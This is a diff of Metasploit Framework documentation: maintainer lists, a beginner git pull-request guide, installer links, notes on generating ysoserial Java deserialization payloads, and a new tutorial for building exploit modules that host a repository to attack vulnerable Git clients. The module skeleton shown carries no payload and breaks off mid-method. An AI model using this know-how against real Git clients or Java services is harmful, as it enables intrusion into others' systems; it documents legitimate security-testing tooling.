 | [@Meatballs1](https://github.com/Meatballs1)      | [meatballs](https://keybase.io/meatballs)          |
 | [@mkienow-r7](https://github.com/mkienow-r7)      | [inokii](https://keybase.io/inokii)                |
 | [@mubix](https://github.com/mubix)                | [mubix](https://keybase.io/mubix)                  |
+| [@nhkaraka-r7](https://github.com/nhkaraka-r7)    |                                                    |
 | [@OJ](https://github.com/OJ)                      | [oj](https://keybase.io/oj)                        |
+| [@rhodgman-r7](https://github.com/rhodgman-r7)    | [rhodgmanr7](https://keybase.io/rhodgmanr7)        |
 | [@scriptjunkie](https://github.com/scriptjunkie)  | [scriptjunkie](https://keybase.io/scriptjunkie)    |
 | [@sgonzalez-r7](https://github.com/sgonzalez-r7)  | [essgee](https://keybase.io/essgee)                |
 | [@smashery](https://github.com/smashery)          | [smashery](https://keybase.io/smashery)            |
+| [@smcintyre-r7](https://github.com/smcintyre-r7)  |                                                    |
 | [@space-r7](https://github.com/space-r7)          | [shelbyp](https://keybase.io/shelbyp)              |
-| [@tdoan-r7](https://github.com/tdoan-r7)          | [doanosaur](https://keybase.io/doanosaur)          |
+| [@tas-r7](https://github.com/tas-r7)              |                                                    |
 | [@timwr](https://github.com/timwr)                | [timwr](https://keybase.io/timwr)                  |
 | [@todb-r7](https://github.com/todb-r7)            | [todb](https://keybase.io/todb)                    |
 | [@void-in](https://github.com/void-in)            | [void_in](https://keybase.io/void_in)              |
-| [@wchen-r7](https://github.com/wchen-r7)          | [wchenr7](https://keybase.io/wchenr7)              |
-| [@zeroSteiner](https://github.com/zeroSteiner)    | [zerosteiner](https://keybase.io/zerosteiner)      |
+| [@zgoldman-r7](https://github.com/zgoldman-r7)    |                                                    |

 Note, keybase.io does **not require** your private key to prove your GitHub
 identity. Actually sharing your private key with Keybase.io is a matter of
@@ -46,7 +51,7 @@ thoughtful argument [for][pro-sharing].

 # Tracking criteria

-In order to get [@bcook-r7](https://github.com/bcook-r7) to track your key, you
+In order to get [@smcintyre-r7](https://github.com/smcintyre-r7) to track your key, you
 alert him to its existence through some non-GitHub means, and verify your
 GitHub username. That's all there is to it.

@@ -33,7 +33,7 @@ Commit rights are granted via votes on the committers mailing list. Voting recor
 1. Any current committer may nominate any one person as a potential committer by writing to the committers mailing list.
 2. The nominator must provide a justification for committer rights, and include the nominee's e-mail address.
 2. After some discussion on the mailing list, there will be a group vote on the nominee.
-2. The Metasploit manager (@busterb) will inform the new committer of their new commit rights and responsibilities, add the new committer to the appropriate ACL groups and mailing lists, and inform the mailing list of the successful completion of these tasks.
+2. The Metasploit manager ([@smcintyre-r7](https://github.com/smcintyre-r7)) will inform the new committer of their new commit rights and responsibilities, add the new committer to the appropriate ACL groups and mailing lists, and inform the mailing list of the successful completion of these tasks.

 Committers introduced in this way will have commit rights to the [public framework repositories](https://github.com/orgs/rapid7/teams/framework-public-committers/repositories).

@@ -6,6 +6,9 @@ However, tackling core Metasploit Framework bugs or particularly squirrelly expl

 Metasploit is a tool by and for hackers, but the hackers that maintain it also happen to be software engineers. So, we have some hopefully easy-to-remember Do's and Don'ts in [CONTRIBUTING.md](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md). Read up on those.

+# Making Your First PR
+Our preferred method of module submission is via a git pull request from a feature branch on your own fork of Metasploit. You can learn more about making your first PR at [[Creating Your First PR]]
+
 # Server exploits

 Server exploits are always in demand; why bother with complicated social engineering campaigns when you can go straight to the pain point of a vulnerable network. Here are some search queries to get you started:
@@ -53,9 +56,6 @@ Again, there's always room on #metasploit on Freenode. Be helpful with the quest

 You probably shouldn't run proof of concept exploit code you find on the Internet on a machine you care about in a network you care about. That is generally considered a Bad Idea. You also probably shouldn't use your usual computer as a target for exploit development, since you are intentionally inducing unstable behavior.

-Our preferred method of module submission is via a git pull request from a feature branch on your own fork of Metasploit.  You can learn how to create one here:
-[[Landing-Pull-Requests]]
-
 Also, please take a peek at our guides on using git and our acceptance guidelines for new modules in case you're not familiar with them.

 If you get stuck, try to explain your specific problem as best you can on our [Freenode IRC](https://freenode.net/) channel, #metasploit (joining requires a [registered nick](https://freenode.net/kb/answer/registration)). Someone should be able to lend a hand. Apparently, some of those people never sleep.
@@ -0,0 +1,136 @@
+# Creating Your First PR - An Intro To Git and the PR Process
+## Intro
+Congratulations fellow traveler, so you're interested in contributing to Metasploit eh? Well welcome aboard, its going to be a fun ride!
+You'll learn lots along the way but here are some tips and tricks that should help you get started with making your first PR request
+whilst also avoiding some common pitfalls and learning how some of our systems work.
+
+## Initial Steps and Important Notes
+The rest of this guide assumes you have already followed the steps at [Setting Up A Developer Environment](https://r-7.co/MSF-DEV) in order to get
+a fork of Metasploit set up and ready to run, and that you have added in your SSH keys 
+(see [Adding a New SSH Key To Your GitHub Account](https://docs.github.com/en/authentication/connecting-to-github-with-ssh/adding-a-new-ssh-key-to-your-github-account)), 
+set up Ruby and optionally the PostgreSQL database, and done any custom shortcuts you wish to configure.
+
+## Getting the Latest Version of Metasploit Framework
+Before making any new contributions, you will want to sure you are running the latest version of Metasploit Framework.
+To do this run `git checkout master && git fetch upstream && git pull`, where `upstream` is the branch connected to the 
+Rapid7 remote, aka Rapid7's copy of the code. You can verify that `upstream` is set correctly by running `git remote get-url upstream`
+and verifying it is set to `git@github.com:rapid7/metasploit-framework.git`.
+
+Once you run this command, it will check out the `master` branch, then fetch all
+the changes from `upstream` (which should be configured to be Rapid7's copy of Metasploit Framework on GitHub). Once
+it has cached these changes, the `git pull` command will then pull these changes into the current branch, aka `master`.
+
+Not pulling down changes before writing new code could lead to big issues down the line, particularly if someone has edited a file
+you intended to modify. In that case maintainers will then have to try find the right combination of changes to implement, which could lead
+to your PR being rejected if these changes are too complex.
+
+## Making Sure Your Gems Are Updated
+The next step is to make sure you have the latest copy of the Gems that Metasploit Framework depends on. This can be done by running `bundle install`
+from the same directory as where the `Gemfile.lock` file is located, which will be in the same folder as wherever you cloned your fork to locally.
+
+Doing this will allow you to make sure that you are running the latest libraries, which will ensure if you do encounter any bugs whilst
+developing code, those bugs are not related to out of date Gems being installed, and are therefore potentially legitimate bugs that need fixing.
+
+## Creating a New Branch for Your Code
+Once all of this is done, you will want to create a new branch for your code, which can be done by running `git checkout -b <your branch name here>`.
+This will snapshot the current branch that you are on, and use that to create a new branch with the name provided. Note that I did say snapshot. This is
+why it's important to update the current branch's code to the latest version of Metasploit Framework available prior to running this command,
+otherwise the new branch will contain outdated code.
+
+## Adding in Your Changes and Creating Meaningful Commit Messages
+Once you have made your code changes, add them using `git add <path to file to add> <optional path to second file to add>`. Note that you can
+specify multiple files to add using `git add` at the same time.
+
+To commit these changes locally, use `git commit -m "<commit message here>"`. Note that as a general rule of thumb, commit messages should aim
+to be 50 characters or less while telling readers what was changed in that commit. You generally don't want to create commits that do multiple things at once,
+instead create a separate commit for each group of items that you are changing, and make sure that the commit message reflects what changed in a general sense.
+
+Note also that maintainers may end up squashing your commits down so that your commit A, B, and C, now become commit D which
+contains all of the same changes as commit A, B, and C, but in one commit and with one associated commit message. This is often
+done when the code is ready to be landed into Metasploit Framework to help make the commit history easier for people to read.
+
+## Checking for Code Errors
+Before code can be accepted into Metasploit Framework, it must also pass our RuboCop and MsfTidy rules. These help ensure that
+all contributors are committing code that follows a common set of standards. To check if your code meets our RuboCop standards, 
+from the root of wherever you cloned your fork of Metasploit Framework to on disk, run `rubocop <path to your module from current directory>`.
+
+Specifying the `-a` parameter will ask RuboCop to check your module and if possible fix any issues that RuboCop is able to fix.
+In this case the command would be `rubocop -a <path to your module from current directory>`. It is encouraged to keep running 
+this command and fixing any issues that come up until RuboCop no longer comes back with any errors to report. Once this is 
+complete, run `git add <file>` followed by `git commit -m "RuboCop Fixes"`. You can change the commit message if you 
+want, but it should mention RuboCop as it helps maintainers know what the commit is related to.
+
+As a good practice rule, you should always separate your commits that contain RuboCop changes from those that contain non-RuboCop related changes.
+This helps ensure that when it comes time to review your code, review can proceed a lot quicker and more efficiently.
+
+Note that special cases exist if you are writing library code as our RuboCop rules are primarily designed to be run against modules.
+If at any point you are confused r.e this, please feel free to reach out and ask us for help on Slack at https://metasploit.com/slack.
+
+Once this is done, the next tool to run is located in the root of the Metasploit local fork at `tools/dev/msftidy.rb`. You will want to run this tool
+against your module code (if applicable), using `tools/dev/msftidy.rb <path to module>`. This will give some output if there are any errors, or no output
+if your module passed the tests. Try and fix any errors mentioned here.
+
+## Writing Documentation
+The next step to do, if you are writing a module, is to write the documentation for the module. You can find some information 
+on how to write module documentation at [Writing Module Documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html).
+
+In general when writing documentation you will want to search for a similar documentation file under the `documentation`
+folder located in the root of the Metasploit fork. You can then copy one of these files and use it as the basis for writing
+your new documentation for your module.
+
+When writing the information for the documentation, be sure to make sure your installation steps are as clear as possible. Any confusion over
+how to set up the target to be exploited will likely result in delays. You will want to put as much detail here as possible.
+
+Additionally any information about caveats, scenarios you have tested, custom options you added in, or quirks you noticed
+should also go into this file.
+
+## Checking Documentation Syntax
+Once you have written the documentation, you then want to run `toos/dev/msftidy_docs.rb <path to documentation file>`. This will report on any
+errors with your documentation file, which you will want to fix before submitting your PR. Notice however that if you get a warning about long lines,
+these may be okay to ignore depending on the context. A good example is if a line is long merely because of a URL. Such warnings can be
+safely ignored.
+
+## Submitting Your Changes and Opening a PR
+Once you have gone through all of the steps above you should be ready to submit your PR. To submit your PR, first check which 
+branch points to your copy of the code. If you have followed the setup guide, it should be `origin`. You can double check this 
+branch's remote URL using `git remote get-url origin`. It should look something like `git@github.com:gwillcox-r7/metasploit-framework`
+with `gwillcox-r7` substituted for your username.
+
+Assuming the `origin` branch is in fact pointing to your copy of the code, run `git push origin local-branch:remote-branch` 
+and replace `local-branch` with the branch locally where your code changes are located, and `remote-branch` with what 
+you want this branch to be called on the remote repository, aka `origin` which will be your fork on GitHub.com. In most 
+cases you will want these two names to be the same to avoid confusion, but its good to know this syntax should you 
+start working with more complex situations. Note that if the branch pointing to your copy of the code is not named `origin`,
+replace the word `origin` in the command above with the name of the branch that does point to your copy of the code.
+
+This should result in output similar to the following:
+
+```
+> git push origin update_mssql_lib_parameters:update_mssql_lib_parameters
+Enumerating objects: 15, done.
+Counting objects: 100% (15/15), done.
+Delta compression using up to 2 threads
+Compressing objects: 100% (8/8), done.
+Writing objects: 100% (8/8), 1.55 KiB | 1.55 MiB/s, done.
+Total 8 (delta 7), reused 0 (delta 0), pack-reused 0
+remote: Resolving deltas: 100% (7/7), completed with 7 local objects.
+remote: 
+remote: Create a pull request for 'update_mssql_lib_parameters' on GitHub by visiting:
+remote:      https://github.com/gwillcox-r7/metasploit-framework/pull/new/update_mssql_lib_parameters
+remote: 
+To github.com:gwillcox-r7/metasploit-framework
+ * [new branch]            update_mssql_lib_parameters -> update_mssql_lib_parameters
+```
+
+To create a new pull request (aka PR), browse to the URL mentioned in this output. In this case for the output above this would
+be `https://github.com/gwillcox-r7/metasploit-framework/pull/new/update_mssql_lib_parameters`.
+
+This will open a new template to create a PR request. Please follow all of the directions here and provide the requested details whilst also
+deleting the template text once you have provided the requested information. Note that PRs that do not provide anything but the template text for
+their description will be closed.
+
+In your PR description you should take care to mention what it is that you are submitting, details on the type of vulnerability and CVE-ID,
+if applicable, how to test the submission, as well as any special concerns or items of note that occurred whilst conducting testing.
+
+Once this is done a member of our team will review your PR within a few days and provide feedback on any changes that may still need to be made
+before the submission can be accepted.
@@ -12,8 +12,10 @@ The pgp signatures below can be verified with the following [public key](https:/

 |Download Link|File Type|SHA1|PGP|
 |-|-|-|-|
-| [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
-| [metasploit-4.21.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
+| [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
+| [metasploit-4.21.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
+| [metasploit-4.21.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-windows-x64-installer.exe.asc)|
+| [metasploit-4.21.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.0-2022052401-linux-x64-installer.run.asc)|
 | [metasploit-4.20.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-windows-x64-installer.exe.asc)|
 | [metasploit-4.20.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.20.0-2021112001-linux-x64-installer.run.asc)|
 | [metasploit-4.19.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.19.1-2021073101-windows-x64-installer.exe.asc)|
@@ -29,7 +29,7 @@ Once the serialized object is generated and stored as `java_payload`, it's then
 ### `#generate_java_deserialization_for_payload(name, payload)`
 This method will generate a serialized Java object that when loaded will execute the specified Metasploit payload. The payload will be converted to an operating system command using one of the supported techniques contained within this method and then passed to [`#generate_java_deserialization_for_command`](#generate_java_deserialization_for_commandname-shell-command).
 
- **name** - The payload name parameter must be one of the supported payloads stored in the `ysoserial` cache.  As of this writing, the list includes: `BeanShelll1`, `Clogure`, `CommonBeanutils1`, `CommonsCollections2`, `CommonsCollections3`, `CommonsCollections4`, `CommonsCollections5`, `CommonsCollections6`, `Groovy1`, `Hibernate1`, `JBossInterceptors1`, `JRMPClient`, `JSON1`, `JavassistWeld1`, `Jdk7u21`, `MozillaRhino1`, `Myfaces1`, `ROME`, `Spring1`, `Spring2`, and `Vaadin1`.  While `ysoserial` includes additional payloads that are not listed above, they are unsupported by the library due to the need for complex inputs.  Should there be use cases for additional payloads, please consider opening an issue and submitting a pull request to add support.
+- **name** - The payload name parameter must be one of the supported payloads stored in the `ysoserial` cache.  As of this writing, the list includes: `BeanShelll1`, `Clogure`, `CommonsBeanutils1`, `CommonsCollections2`, `CommonsCollections3`, `CommonsCollections4`, `CommonsCollections5`, `CommonsCollections6`, `Groovy1`, `Hibernate1`, `JBossInterceptors1`, `JRMPClient`, `JSON1`, `JavassistWeld1`, `Jdk7u21`, `MozillaRhino1`, `Myfaces1`, `ROME`, `Spring1`, `Spring2`, and `Vaadin1`.  While `ysoserial` includes additional payloads that are not listed above, they are unsupported by the library due to the need for complex inputs.  Should there be use cases for additional payloads, please consider opening an issue and submitting a pull request to add support.
 
 - **payload** - The payload object to execute on the remote system. This is the native Metasploit payload object and it will be automatically converted to an operating system command using a technique suitable for the target platform and architecture. For example, x86 Windows payloads will be converted using a Powershell command. Not all platforms and architecture combinations are supported. Unsupported combinations will result in a `RuntimeError` being raised which will need to be handled by the module developer.

@@ -169,4 +169,4 @@ DONE!  Successfully generated 0 static payloads and 22 dynamic payloads.  Skippe
 At completion, the `data/ysoserial_payloads.json` file is overwritten and the 22 dynamic payloads are ready for use within the framework.  Afterward, the developer should follow the standard `git` procedures to `add` and `commit` the new JSON file  before generating a pull request and landing the updated JSON into the framework's `master` branch.

 [1]: https://github.com/pimps/ysoserial-modified/blob/e71f70dbc5e8c27d72873014ac5cb7766f4b5b94/src/main/java/ysoserial/payloads/util/CmdExecuteHelper.java#L11-L30
-[2]: https://github.com/rapid7/metasploit-framework/blob/d580e7d12218fbf62b190a0c0c6d25f43b8aa5be/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb
+[2]: https://github.com/rapid7/metasploit-framework/blob/d580e7d12218fbf62b190a0c0c6d25f43b8aa5be/modules/exploits/multi/http/shiro_rememberme_v124_deserialize.rb
@@ -84,6 +84,10 @@ OptSomething.new(option_name, [boolean, description, value, *enums*], aliases: *
 * **conditions** - *optional*, *key-word only* An array of a condition for which the option should be displayed. This
  can be used to hide options when they are irrelevant based on other configurations. See the [Filtering datastore
  options](#Filtering-datastore-options) section for more information.
+* **fallbacks** *optional*, *key-word only* An array of names that will be used as a fallback if the main option name is
+  defined by the user. This is useful in the scenario of wanting specialised option names such as `SMBUser`, but to also
+  support gracefully checking a list of more generic fallbacks option names such as `Username`. This functionality is 
+  currently behind a feature flag, set with `features set datastore_fallbacks true` in msfconsole

 Now let's talk about what classes are available:

@@ -0,0 +1,399 @@
+This page walks through the process of creating an exploit module for vulnerable Git clients.
+
+### Building a Repository
+
+Many of the existing Git exploits in Metasploit rely on being able to host a valid repository that a Git client can successfully clone. So to get started with building an exploit, the contents of the repo need to be decided on first.
+
+Let's say that the repository is something like the following:
+
+```
+space@vm:~/test-repo$ ls -al
+total 20
+drwxrwxr-x  4 space space 4096 Sep 16 14:06 .
+drwxr-x--- 23 space space 4096 Sep 16 14:05 ..
+drwxrwxr-x  2 space space 4096 Sep 16 14:06 dir
+-rw-rw-r--  1 space space   10 Sep 16 14:06 file.txt
+drwxrwxr-x  7 space space 4096 Sep 16 14:06 .git
+space@vm:~/test-repo$ ls -al dir
+total 12
+drwxrwxr-x 2 space space 4096 Sep 16 14:06 .
+drwxrwxr-x 4 space space 4096 Sep 16 14:06 ..
+-rw-rw-r-- 1 space space    5 Sep 16 14:06 test_file.txt
+```
+
+The `.git` directory is the only component of the repository that won't be sent,
+so the repository will consist of the `file.txt`, the `dir` folder, and the `test_file.txt` file that lives within the `dir`  folder. Every file and directory inside the repo is represented as a Git object: File contents are represented as blob objects which get coupled together to form a tree object. Lastly, a commit object is created to hold information about the tree object, including the tree's sha, the author of the commit, a commit message, etc.
+
+There will need to be two tree objects to represent the contents of `dir` and the contents
+of the root of the repository. Starting with the contents of `dir`, a blob object
+needs to be created to represent the contents of `test_file.txt`:
+
+```
+space@vm:~/test-repo$ cat dir/test_file.txt 
+test
+```
+
+The [Git mixin][1] contains the functionality for building a Git object.
+To build a blob object, the `build_blob_object()` class method should be used:
+
+```
+>> contents = "test\n"
+=> "test\n"
+>> blob = Msf::Exploit::Git::GitObject.build_blob_object(contents)
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe163c75cd0                                            
+```
+
+The resulting object will contain the object type, its original contents,
+its compressed contents, its sha, and its path (where the commit object will
+be stored client side). Since this will be the only file in the `dir` folder,
+the tree object can be created with `Msf::Exploit::Git::GitObject.build_tree_object()`.
+A tree object is represented differently, holding information about each file contained
+in the directory, such as file permissions, file name, object type, and the file's sha1 hash.
+Because of that, the `build_tree_object()` expects a hash or an array of hashes,
+where each hash looks like the following:
+
+```
+>> tree_entry =
+{
+	mode: '100644',
+	file_name: 'test_file.txt',
+	sha1: blob.sha1
+}
+```
+
+And using that, the tree object can now be created:
+
+```
+>> tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_entry)
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe161b0cd78
+```
+
+Now that the `dir` folder is represented in Git objects, we can represent the root
+of the repository. That just requires creating a `blob` object for `file.txt`,
+creating a `tree` object representing the top-level directory, and finally a commit object.
+
+Again, a blob object needs to be created to represent the contents of the remaining file:
+
+```
+space@vm:~/test-repo$ cat file.txt
+some text
+```
+
+```
+>> contents = "some text\n"
+=> "some text\n"
+>> file_blob = Msf::Exploit::Git::GitObject.build_blob_object(contents)
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe163bf54b8                                              
+...                                                                                            
+```
+
+Then, a new tree object needs to be created to represent the top-level directory,
+which includes `file.txt` and the `dir` folder:
+
+```
+?> entries = [
+?>   {
+?>     mode: '100644',
+?>     file_name: 'file.txt',
+?>     sha1: file_blob.sha1
+?>   },
+?>   {
+?>     mode: '040000',
+?>     file_name: 'dir',
+?>     sha1: tree_object.sha1
+?>   }
+>> ]
+=> [{:mode=>"100644", :file_name=>"file.txt", :sha1=>"b649a9bf89116c581f8329b8ec3c79a86a70...
+>> top_level_obj = Msf::Exploit::Git::GitObject.build_tree_object(entries)
+```
+
+The `build_commit_object()` method takes a hash that expects the sha1 hash for
+the tree created, the sha1 hash for the parent commit if one exists, and optional
+data such as an author name, email address, company name, commit message, etc.
+If the user chooses not to pass in data for the optional data, `Faker` will generate
+random data for them.
+
+```
+>> commit_object = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: top_level_obj.sh
+a1)
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe1533ac848                                              
+...                                                                                            
+>> commit_object
+=> 
+#<Msf::Exploit::Git::GitObject:0x00007fe1533ac848                                              
+ @compressed=                                                                                  
+  "x\x9C\x95\xCEA\x0E\xC2 \x10\x05P\xD7\x9Cb<@\r\x1DZ\xCA\xC2\x18\xE3\xCE\xA8g0XF!\xB6\xD0\x00]x{I\xED\x05\\\xCD\xE4'\xF3\xFE\xF4a\x1C]\x06\x14j\x93#\x11pe\b\el5u]cL#\xD1\x18\xC9\x05\x97\x92\x04*\xF3h\xA5P}\xC7\x89\xE99\xDB\x10\xE1\xEA\x92\xF6&j\xB8\xCC\x93\xD5\x03\xEC\xDF\xCB\xBC\x0Fk~\xB43\ri\xE7)\x1F\xA0\xAEU[\x10l\x05T\x85\xE4\xAC_\xCA3\xFD\xC7\xA8\x0E%\nQ\xE3\xAA\xB0\xB3w\xD9\x95\xA3\x1F\a9@\x98\xC8\xC3\xAB\xEC\x91\xA6\x90\\\x0E\xF1\x03\xCF\xF2\xED\xC9\xF9T\xDD\x82\x8D[\xF6\x05s\xF7P\x89",                                                                       
+ @content=                                                                                     
+  "tree 08de2425ae774dd462dd603066e328db5638c70e\nauthor Lisandra Kuphal <kuphal_lisandra@huels.net> 1185328253 -0300\ncommitter Lisandra Kuphal <kuphal_lisandra@huels.net> 872623312 -0300\n\nInitial commit to open git repository for Bins-Mohr!\n",
+ @path="01/8856fe17403b0991e5d1d3eb7f62dca4d8e951",
+ @sha1="018856fe17403b0991e5d1d3eb7f62dca4d8e951",
+ @type="commit">
+```
+
+That's all that is needed to create a valid repository in Metasploit.
+
+### Hosting the Repository
+
+Metasploit's current implementation of the Git protocol works over HTTP ([SmartHttp docs][3]),
+so to host a malicious repository with Metasploit, the exploit module needs to
+leverage the `Msf::Exploit::Remote::HttpServer` mixin. Additionally,
+the [Git][1] and [Git SmartHttp][2] mixins need to be included to build objects
+and create appropriate responses for the client's requests.
+
+The module should look similar to other exploit modules that use the HttpServer mixin,
+defining an `on_request_uri()` method, a `primer()` method, and an `exploit()` method.
+The `primer()` method is first to execute, so setup for things like the repository uri
+can happen there:
+
+```ruby
+  # Creates a random uri for the Git repo, ensuring that there are no spaces
+  def create_git_uri
+    "/#{Faker::App.name.downcase}.git".gsub(' ', '-')
+  end
+
+  # Uses GIT_URI datastore option or randomly generates a repo URI
+  # Registers the URI with the http server and prints the entire path that client should pass to git clone
+  def primer
+    @git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI']
+    @git_addr = URI.parse(get_uri).merge(@git_repo_uri)
+    print_status("Git repository to clone: #{@git_addr}")
+    hardcoded_uripath(@git_repo_uri)
+  end
+```
+
+Next, the `exploit()` method can be used to set up the repository.
+The code used in the `Building a Repository` section can be placed here
+before entering the listen / accept loop.
+
+The `on_request_uri()` method is where most of the module logic will live.
+No matter what the client sends, the request should first be parsed
+by `Msf::Exploit::Git::SmartHttp::Request.parse_raw_request()`.
+The `parse_raw_request()` method will format the request so it is easier to work with.
+The first request that a client will send when cloning a repository is a reference
+discovery request. The client will expect things like server capabilities and the
+reference that `HEAD` points to in the response. Since this is a simple repo only one
+branch will exist, so `HEAD` will point to `refs/heads/master` and `refs/heads/master`
+will point to the latest commit in the repo, which in this case is the only commit
+in the repo. This can be represented as the following hash:
+
+```ruby
+refs =
+{
+	'HEAD' => 'refs/heads/master',
+	'refs/heads/master' => commit_object.sha1
+}
+```
+
+Creating a proper response to a `ref-discovery` request is done through
+`Msf::Exploit::Git::SmartHttp.get_ref_discovery_response()`. It takes two parameters:
+The request object from `parse_raw_request()` and the above `refs` hash.
+After the response is built, it can be sent back to the client.:
+
+```ruby
+response = get_ref_discovery_response(request, @refs)
+cli.send_response(response)
+```
+
+If the client successfully receives the `ref-discovery` response,
+it will then send an `upload-pack` request. The `upload-pack` request is a `POST`
+request containing the client's capabilities and a 'want' list for objects in
+the repository. To create a proper response, the `Msf::Exploit::Git::SmartHttp.get_upload_pack_response()`
+method should be used. Again, this method accepts two arguments. The first is the
+parsed request from the client, and the second is an array of all objects that exist
+in the repo. The `get_upload_pack_response()` method will check the sha1 hash of
+each object against the hashes in the want list that the client sent and send only
+the requested object hashes.
+
+```ruby
+response = get_upload_pack_response(request, @git_objs)
+cli.send_response(response)
+```
+
+Upon receiving the `upload-pack` response from the server,
+the client will build out the repository.
+
+Putting it all together, the module should look something like the following:
+
+```ruby
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Git
+  include Msf::Exploit::Git::SmartHttp
+  include Msf::Exploit::Remote::HttpServer
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Git Clone Test',
+        'Description' => %q{
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ ],
+        'References' => [ ],
+        'DisclosureDate' => '2022-09-22',
+        'Platform' => [ 'unix' ],
+        'Arch' => ARCH_CMD,
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {}
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('GIT_URI', [ false, 'The URI to use as the malicious Git instance (empty for random)', '' ])
+      ]
+    )
+
+    deregister_options('RHOSTS', 'RPORT')
+  end
+
+  def exploit
+    setup_repo_structure
+    super
+  end
+
+  def setup_repo_structure
+    # create blob object for contents of 'test_file.txt'
+    contents = "test\n"
+    blob = Msf::Exploit::Git::GitObject.build_blob_object(contents)
+
+    # create tree object representing 'test_file.txt' in 'dir' folder
+    tree_entry =
+    {
+      mode: '100644',
+      file_name: 'test_file.txt',
+      sha1: blob.sha1
+    }
+    tree_object = Msf::Exploit::Git::GitObject.build_tree_object(tree_entry)
+
+    # create blob object for contents of 'file.txt'
+    contents = "some text\n"
+    file_blob = Msf::Exploit::Git::GitObject.build_blob_object(contents)
+
+    # create tree object representing top-level directory of repo
+    entries =
+    [
+      {
+        mode: '100644',
+        file_name: 'file.txt',
+        sha1: file_blob.sha1
+      },
+      {
+        mode: '040000',
+        file_name: 'dir',
+        sha1: tree_object.sha1
+      }
+    ]
+    top_level_obj = Msf::Exploit::Git::GitObject.build_tree_object(entries)
+
+    # create commit
+    commit_object = Msf::Exploit::Git::GitObject.build_commit_object(tree_sha1: top_level_obj.sha1)
+
+    # create list of objects in repository, as the
+    # client will request them to build the repository
+    @git_objs =
+      [
+        commit_object, top_level_obj, tree_object,
+        file_blob, tree_object, blob
+      ]
+
+    @refs =
+      {
+        'HEAD' => 'refs/heads/master',
+        'refs/heads/master' => commit_object.sha1
+      }
+  end
+
+  def create_git_uri
+    "/#{Faker::App.name.downcase}.git".gsub(' ', '-')
+  end
+
+  def primer
+    @git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI']
+    @git_addr = URI.parse(get_uri).merge(@git_repo_uri)
+    print_status("Git repository to clone: #{@git_addr}")
+    hardcoded_uripath(@git_repo_uri)
+  end
+
+  def on_request_uri(cli, req)
+    request = Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(req)
+    case request.type
+    when 'ref-discovery'
+      response = get_ref_discovery_response(request, @refs)
+      fail_with(Failure::UnexpectedReply, 'Git client did not send a valid ref-discovery request') unless response
+    when 'upload-pack'
+      response = get_upload_pack_response(request, @git_objs)
